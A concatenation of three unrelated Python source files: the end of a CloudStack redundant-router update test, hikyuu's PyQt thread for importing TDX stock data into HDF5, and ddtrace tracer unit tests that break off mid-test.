if "Complete" not in message:
self.fail(message)
self.info("Network update Started, the old backup router will get destroyed and a new router will be created")
self.chek_for_new_backupRouter(old_backup_router)
master_router, new_backup_router=self.get_master_and_backupRouter()
#the state of the master router should be running. while backup is being updated
self.assertEqual(master_router.state, "Running", "State of the master router is not running")
self.assertEqual(master_router.redundantstate, 'MASTER', "Redundant state of the master router should be MASTER, but it is %s"%master_router.redundantstate)
self.info("Old backup router:"+old_backup_router.name+" is destroyed and new router:"+new_backup_router.name+" got created")
#wait for the new backup to become master.
retry = 4
while new_backup_router.name != master_router.name:
retry = retry-1
if retry == 0:
break
time.sleep(self.testdata["sleep"])
self.info("wating for backup router to become master router name:"+new_backup_router.name)
master_router, backup_router = self.get_master_and_backupRouter()
if retry == 0:
self.fail("timed out while waiting for new backup router to change state to MASTER.")
#new backup router has become master.
self.info("newly created router:"+new_backup_router.name+" has changed state to Master")
self.info("old master router:"+old_master_router.name+"is destroyed")
#old master will get destroyed and a new backup will be created.
#wait until new backup changes state from unknown to backup
master_router, backup_router = self.get_master_and_backupRouter()
retry = 4
while backup_router.redundantstate != 'BACKUP':
retry = retry-1
self.info("waiting for router:"+backup_router.name+" to change state to Backup")
if retry == 0:
break
time.sleep(self.testdata["sleep"])
master_router, backup_router = self.get_master_and_backupRouter()
self.assertEqual(master_router.state, "Running", "State of the master router is not running")
self.assertEqual(master_router.redundantstate, 'MASTER', "Redundant state of the master router should be MASTER, but it is %s"%master_router.redundantstate)
if retry == 0:
self.fail("timed out while waiting for new backup rotuer to change state to MASTER.")
#the network update is complete.finally both the router should be running.
new_master_router, new_backup_router=self.get_master_and_backupRouter()
self.assertEqual(new_master_router.state, "Running", "State of the master router:"+new_master_router.name+" is not running")
self.assertEqual(new_backup_router.state, "Running", "State of the backup router:"+new_backup_router.name+" is not running")
worker_process.join()
|
UseTdxImportToH5Thread.py | # coding:utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2010-2017 fasiondog/hikyuu
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import sqlite3
from multiprocessing import Queue, Process
from PyQt5.QtCore import QThread, pyqtSignal
from hikyuu.gui.data.ImportTdxToH5Task import ImportTdxToH5Task
from hikyuu.gui.data.ImportWeightToSqliteTask import ImportWeightToSqliteTask
from hikyuu.data.common_sqlite3 import create_database
from hikyuu.data.tdx_to_h5 import tdx_import_stock_name_from_file
from hikyuu.util.mylog import class_logger
class UseTdxImportToH5Thread(QThread):
message = pyqtSignal(list)
def __init__(self, parent, config):
super(UseTdxImportToH5Thread, self).__init__()
self.logger = logging.getLogger(self.__class__.__name__)
self.parent = parent
self.log_queue = parent.mp_log_q if parent is not None else None
self.config = config
self.msg_name = 'HDF5_IMPORT'
self.process_list = []
src_dir = config['tdx']['dir']
dest_dir = config['hdf5']['dir']
sqlite_file_name = dest_dir + "/stock.db"
self.quotations = []
if self.config['quotation']['stock']:
self.quotations.append('stock')
if self.config['quotation']['fund']:
self.quotations.append('fund')
#if self.config['quotation']['future']:
# self.quotations.append('future')
#通达信盘后没有债券数据。另外,如果用Pytdx下载债券数据,
#每个债券本身的数据很少但债券种类太多占用空间和时间太多,用途较少不再考虑导入
#if self.config['quotation']['bond']:
# self.quotations.append('bond')
self.queue = Queue()
self.tasks = []
if self.config.getboolean('weight', 'enable', fallback=False):
self.tasks.append(ImportWeightToSqliteTask(self.log_queue, self.queue, self.config, dest_dir))
if self.config.getboolean('ktype', 'day', fallback=False):
self.tasks.append(
ImportTdxToH5Task(self.log_queue, self.queue, config, 'SH', 'DAY', self.quotations, src_dir, dest_dir)
)
self.tasks.append(
ImportTdxToH5Task(self.log_queue, self.queue, config, 'SZ', 'DAY', self.quotations, src_dir, dest_dir)
)
if self.config.getboolean('ktype', 'min5', fallback=False):
self.tasks.append(
ImportTdxToH5Task(self.log_queue, self.queue, config, 'SH', '5MIN', self.quotations, src_dir, dest_dir)
)
self.tasks.append(
ImportTdxToH5Task(self.log_queue, self.queue, config, 'SZ', '5MIN', self.quotations, src_dir, dest_dir)
)
if self.config.getboolean('ktype', 'min', fallback=False):
self.tasks.append(
ImportTdxToH5Task(self.log_queue, self.queue, config, 'SH', '1MIN', self.quotations, src_dir, dest_dir)
)
self.tasks.append(
ImportTdxToH5Task(self.log_queue, self.queue, config, 'SZ', '1MIN', self.quotations, src_dir, dest_dir)
)
def __del__(self):
for p in self.process_list:
if p.is_alive():
p.terminate()
def send_message(self, msg):
self.message.emit([self.msg_name] + msg)
def run(self):
try:
self._run()
except Exception as e:
self.send_message(['THREAD', 'FAILURE', str(e)])
else:
self.send_message(['THREAD', 'FINISHED'])
def _run(self):
src_dir = self.config['tdx']['dir']
dest_dir = self.config['hdf5']['dir']
hdf5_import_progress = {'SH': {'DAY': 0, '1MIN': 0, '5MIN': 0}, 'SZ': {'DAY': 0, '1MIN': 0, '5MIN': 0}}
#正在导入代码表
self.send_message(['START_IMPORT_CODE'])
connect = sqlite3.connect(dest_dir + "/stock.db")
create_database(connect)
tdx_import_stock_name_from_file(connect, src_dir + "\\T0002\\hq_cache\\shm.tnf", 'SH', self.quotations)
tdx_import_stock_name_from_file(connect, src_dir + "\\T0002\\hq_cache\\szm.tnf", 'SZ', self.quotations)
self.send_message(['FINISHED_IMPORT_CODE'])
self.process_list.clear()
for task in self.tasks:
p = Process(target=task)
self.process_list.append(p)
p.start()
finished_count = len(self.tasks)
while finished_count > 0:
message = self.queue.get()
taskname, market, ktype, progress, total = message
if progress is None:
finished_count -= 1
if taskname == 'IMPORT_KDATA':
self.send_message(['IMPORT_KDATA', 'FINISHED', market, ktype, total])
else:
self.send_message([taskname, 'FINISHED'])
continue
if taskname == 'IMPORT_WEIGHT':
if market == 'INFO':
self.send_message(['INFO', ktype])
self.send_message(['IMPORT_WEIGHT', market, total])
elif taskname == 'IMPORT_KDATA':
hdf5_import_progress[market][ktype] = progress
current_progress = (hdf5_import_progress['SH'][ktype] + hdf5_import_progress['SZ'][ktype]) // 2
self.send_message(['IMPORT_KDATA', ktype, current_progress])
else:
self.logger.error("Unknow task: {}".format(taskname))
|
test_tracer.py | # -*- coding: utf-8 -*-
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
import os
from os import getpid
import threading
from unittest.case import SkipTest
import warnings
import mock
import pytest
import ddtrace
from ddtrace.constants import ENV_KEY
from ddtrace.constants import HOSTNAME_KEY
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.constants import ORIGIN_KEY
from ddtrace.constants import SAMPLING_PRIORITY_KEY
from ddtrace.constants import VERSION_KEY
from ddtrace.context import Context
from ddtrace.ext import priority
from ddtrace.ext import system
from ddtrace.internal.writer import AgentWriter
from ddtrace.internal.writer import LogWriter
from ddtrace.settings import Config
from ddtrace.tracer import Tracer
from ddtrace.vendor import six
from tests import DummyTracer
from tests import DummyWriter
from tests import TracerTestCase
from tests import override_global_config
from tests.subprocesstest import run_in_subprocess
from .. import override_env
def get_dummy_tracer():
return DummyTracer()
class TracerTestCases(TracerTestCase):
def test_tracer_vars(self):
span = self.trace("a", service="s", resource="r", span_type="t")
span.assert_matches(name="a", service="s", resource="r", span_type="t")
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace("a")
span.assert_matches(name="a", service=None, resource="a", span_type=None)
span.finish()
def test_tracer(self):
def _mix():
with self.trace("cake.mix"):
pass
def _bake():
with self.trace("cake.bake"):
pass
def _make_cake():
with self.trace("cake.make") as span:
span.service = "baker"
span.resource = "cake"
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name="cake.make", resource="cake", service="baker", parent_id=None),
(
# Span with no children
dict(name="cake.mix", resource="cake.mix", service="baker"),
# Span with no children
dict(name="cake.bake", resource="cake.bake", service="baker"),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap("decorated_function", service="s", resource="r", span_type="t")
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f("a", "b")
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name="decorated_function",
service="s",
resource="r",
span_type="t",
meta=dict(a="b"),
)
def test_tracer_pid(self):
with self.trace("root") as root_span:
with self.trace("child") as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name="tests.tracer.test_tracer.f"))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception("bim")
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name="tests.test_tracer.f",
error=1,
meta={
"error.msg": ex.message,
"error.type": ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap("inner")
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
@self.tracer.wrap("outer")
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
with self.trace("mid"):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, "outer")
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap("inner")
def inner():
pass
@self.tracer.wrap("outer")
def outer():
with self.trace("mid"):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name="outer"),
((dict(name="mid"), (dict(name="inner"),)),),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name="tests.tracer.test_tracer.s")
self.spans[1].assert_matches(name="tests.tracer.test_tracer.c")
self.spans[2].assert_matches(name="tests.tracer.test_tracer.i")
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name="wrap.overwrite",
meta=dict(args="(42,)", kwargs="{'kw_param': 42}"),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace("wrap.overwrite") as span:
span.set_tag("args", args)
span.set_tag("kwargs", kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace("wrap.parent", service="webserver"):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name="wrap.parent", service="webserver"),
(dict(name="wrap.overwrite", service="webserver", meta=dict(args="(42,)", kwargs="{'kw_param': 42}")),),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace("foo") as s:
s.set_tag("a", "b")
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest("numpy not installed")
# a weird case where manually calling finish with an unserializable
# span was causing an loop of serialization.
with self.trace("parent") as span:
span.metrics["as"] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace("foo")
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace("bar")
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace("brie")
s1.finish()
self.assertIsNone(s1.get_tag("env"))
self.assertIsNone(s1.get_tag("other"))
self.tracer.set_tags({"env": "prod"})
s2 = self.trace("camembert")
s2.finish()
self.assertEqual(s2.get_tag("env"), "prod")
self.assertIsNone(s2.get_tag("other"))
self.tracer.set_tags({"env": "staging", "other": "tag"})
s3 = self.trace("gruyere")
s3.finish()
self.assertEqual(s3.get_tag("env"), "staging")
self.assertEqual(s3.get_tag("other"), "tag")
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace("fake_span")
ctx = self.tracer.get_call_context()
assert ctx.trace_id == span.trace_id
assert ctx.span_id == span.span_id
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace("fake_span")
assert self.tracer.current_span() == span
span.finish()
with self.trace("fake_span") as span:
assert self.tracer.current_span() == span
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
# Tracer Context Provider must return a Context object
# even if empty
ctx = self.tracer.context_provider.active()
assert isinstance(ctx, Context)
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace("web.request")
span.assert_matches(name="web.request", trace_id=42, parent_id=100)
def test_start_span(self):
# it should create a root Span
span = self.tracer.start_span("web.request")
assert span.name == "web.request"
assert span.parent_id is None
span.finish()
spans = self.tracer.writer.pop()
assert len(spans) == 1
assert spans[0] is span
def test_start_span_optional(self):
# it should create a root Span with arguments
with self.start_span("web.request", service="web", resource="/", span_type="http") as span:
pass
span.assert_matches(
name="web.request",
service="web",
resource="/",
span_type="http",
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(service=None)
span.finish()
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided a default
with self.override_global_config(dict(service="mysvc")):
with self.start_span("") as span:
span.assert_matches(service="mysvc")
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
with self.start_span("child", child_of=parent) as child:
pass
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
with self.start_span("web.request") as parent:
assert self.tracer.current_span() is None
with self.start_span("web.worker", child_of=parent) as child:
assert self.tracer.current_span() is None
parent.assert_matches(
name="web.request",
parent_id=None,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name="web.worker",
parent_id=parent.span_id,
_parent=parent,
tracer=self.tracer,
)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
with self.start_span("web.request", service="web", resource="/", span_type="http") as parent:
with self.start_span("web.worker", child_of=parent) as child:
child.assert_matches(name="web.worker", service="web")
def test_start_child_from_context(self):
# it should create a child span with a populated Context
with self.start_span("web.request") as root:
with self.start_span("web.worker", child_of=root.context) as child:
pass
child.assert_matches(
name="web.worker",
parent_id=root.span_id,
trace_id=root.trace_id,
_parent=root,
tracer=self.tracer,
)
def test_adding_services(self):
assert self.tracer._services == set()
with self.start_span("root", service="one") as root:
assert self.tracer._services == set(["one"])
with self.start_span("child", service="two", child_of=root):
pass
assert self.tracer._services == set(["one", "two"])
def test_configure_runtime_worker(self):
# by default runtime worker not started though runtime id is set
self.assertIsNone(self.tracer._runtime_worker)
# configure tracer with runtime metrics collection
self.tracer.configure(collect_metrics=True)
self.assertIsNotNone(self.tracer._runtime_worker)
def test_configure_dogstatsd_host(self):
with warnings.catch_warnings(record=True) as ws:
warnings.simplefilter("always")
self.tracer.configure(dogstatsd_host="foo")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 8125
# verify warnings triggered
assert len(ws) >= 1
for w in ws:
if issubclass(w.category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning):
assert "Use `dogstatsd_url`" in str(w.message)
break
else:
assert 0, "dogstatsd warning not found"
def test_configure_dogstatsd_host_port(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
self.tracer.configure(dogstatsd_host="foo", dogstatsd_port="1234")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 1234
# verify warnings triggered
assert len(w) >= 2
assert issubclass(w[0].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert "Use `dogstatsd_url`" in str(w[0].message)
assert issubclass(w[1].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert "Use `dogstatsd_url`" in str(w[1].message)
def test_configure_dogstatsd_url_host_port(self):
self.tracer.configure(dogstatsd_url="foo:1234")
assert self.tracer._dogstatsd_client.host == "foo"
assert self.tracer._dogstatsd_client.port == 1234
def test_configure_dogstatsd_url_socket(self):
self.tracer.configure(dogstatsd_url="unix:///foo.sock")
assert self.tracer._dogstatsd_client.host is None
assert self.tracer._dogstatsd_client.port is None
assert self.tracer._dogstatsd_client.socket_path == "/foo.sock"
def test_span_no_runtime_tags(self):
self.tracer.configure(collect_metrics=False)
with self.start_span("root") as root:
with self.start_span("child", child_of=root.context) as child:
pass
self.assertIsNone(root.get_tag("language"))
self.assertIsNone(child.get_tag("language"))
def test_only_root_span_runtime_internal_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("custom", "template", "web", "worker"):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") == "python"
assert child.get_tag("language") is None
def test_only_root_span_runtime_external_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in (
"algoliasearch.search",
"boto",
"cache",
"cassandra",
"elasticsearch",
"grpc",
"kombu",
"http",
"memcached",
"redis",
"sql",
"vertica",
):
with self.start_span("root", span_type=span_type) as root:
with self.start_span("child", child_of=root) as child:
pass
assert root.get_tag("language") is None
assert child.get_tag("language") is None
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer._hostname == "localhost"
assert t.writer._port == 8126
t = ddtrace.Tracer(url="http://foobar:12")
assert t.writer._hostname == "foobar"
assert t.writer._port == 12
t = ddtrace.Tracer(url="unix:///foobar")
assert t.writer._uds_path == "/foobar"
t = ddtrace.Tracer(url="http://localhost")
assert t.writer._hostname == "localhost"
assert t.writer._port == 80
assert not t.writer._https
t = ddtrace.Tracer(url="https://localhost")
assert t.writer._hostname == "localhost"
assert t.writer._port == 443
assert t.writer._https
with pytest.raises(ValueError) as e:
ddtrace.Tracer(url="foo://foobar:12")
assert str(e) == "Unknown scheme `https` for agent URL"
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert not t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=None)
def test_tracer_configure_writer_stop_unstarted():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Make sure we aren't calling stop for an unstarted writer
t.configure(hostname="localhost", port=8126)
assert not orig_writer.stop.called
def test_tracer_configure_writer_stop_started():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
orig_writer = t.writer
# Do a write to start the writer
with t.trace("something"):
pass
t.configure(hostname="localhost", port=8126)
orig_writer.stop.assert_called_once_with()
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t._dogstatsd_client.host == "localhost"
assert t._dogstatsd_client.port == 8125
t = ddtrace.Tracer(dogstatsd_url="foobar:12")
assert t._dogstatsd_client.host == "foobar"
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url="udp://foobar:12")
assert t._dogstatsd_client.host == "foobar"
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url="/var/run/statsd.sock")
assert t._dogstatsd_client.socket_path == "/var/run/statsd.sock"
t = ddtrace.Tracer(dogstatsd_url="unix:///var/run/statsd.sock")
assert t._dogstatsd_client.socket_path == "/var/run/statsd.sock"
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url="foo://foobar:12")
assert str(e) == "Unknown url format for `foo://foobar:12`"
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace("test", service="test"):
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer != original_writer
assert t.writer._buffer != original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 0
assert len(t.writer._buffer) == 1
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
assert errors.empty(), errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace("test", service="test"):
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._buffer == original_writer._buffer
# Assert the trace got written into the correct queue
assert len(original_writer._buffer) == 1
assert len(t.writer._buffer) == 1
def test_tracer_trace_across_fork():
"""
When a trace is started in a parent process and a child process is spawned
The trace should be continued in the child process
"""
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
def task(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 1
(child,) = children
assert parent.trace_id == child["trace_id"]
assert child["parent_id"] == parent.span_id
def test_tracer_trace_across_multiple_forks():
"""
When a trace is started and crosses multiple process boundaries
The trace should be continued in the child processes
"""
tracer = ddtrace.Tracer()
tracer.writer = DummyWriter()
# Start a span in this process then start a child process which itself
# starts a span and spawns another child process which starts a span.
def task(tracer, q):
tracer.writer = DummyWriter()
def task2(tracer, q):
tracer.writer = DummyWriter()
with tracer.trace("child2"):
pass
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id) for s in spans])
with tracer.trace("child1"):
q2 = multiprocessing.Queue()
p = multiprocessing.Process(target=task2, args=(tracer, q2))
p.start()
p.join()
task2_spans = q2.get()
spans = tracer.writer.pop()
q.put([dict(trace_id=s.trace_id, parent_id=s.parent_id, span_id=s.span_id) for s in spans] + task2_spans)
# Assert tracer in a new process correctly recreates the writer
q = multiprocessing.Queue()
with tracer.trace("parent") as parent:
p = multiprocessing.Process(target=task, args=(tracer, q))
p.start()
p.join()
children = q.get()
assert len(children) == 2
child1, child2 = children
assert parent.trace_id == child1["trace_id"] == child2["trace_id"]
assert child1["parent_id"] == parent.span_id
assert child2["parent_id"] == child1["span_id"]
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with override_global_config(dict(version="1.2.3")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "1.2.3"
# override manually
span.set_tag(VERSION_KEY, "4.5.6")
assert span.get_tag(VERSION_KEY) == "4.5.6"
# With no `config.version` defined
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, "1.2.3")
assert span.get_tag(VERSION_KEY) == "1.2.3"
# With global tags set
t.set_tags({VERSION_KEY: "tags.version"})
with override_global_config(dict(version="config.version")):
with t.trace("test.span") as span:
assert span.get_tag(VERSION_KEY) == "config.version"
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with override_global_config(dict(env="prod")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "prod"
# override manually
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With no `config.env` defined
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, "prod-staging")
assert span.get_tag(ENV_KEY) == "prod-staging"
# With global tags set
t.set_tags({ENV_KEY: "tags.env"})
with override_global_config(dict(env="config.env")):
with t.trace("test.span") as span:
assert span.get_tag(ENV_KEY) == "config.env"
class EnvTracerTestCase(TracerTestCase):
"""Tracer test cases requiring environment variables."""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
with self.start_span("") as span:
pass
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
with self.start_span("") as span:
pass
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env(self):
assert isinstance(self.tracer.original_writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
assert isinstance(self.tracer.original_writer, AgentWriter)
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2"))
def test_dd_tags(self):
assert self.tracer.tags["key1"] == "value1"
assert self.tracer.tags["key2"] == "value2"
@run_in_subprocess(env_overrides=dict(DD_TAGS="key1:value1,key2:value2,key3"))
def test_dd_tags_invalid(self):
assert "key1" in self.tracer.tags
assert "key2" in self.tracer.tags
assert "key3" not in self.tracer.tags
@run_in_subprocess(env_overrides=dict(DD_TAGS="service:mysvc,env:myenv,version:myvers"))
def test_tags_from_DD_TAGS(self):
t = ddtrace.Tracer()
with t.trace("test") as s:
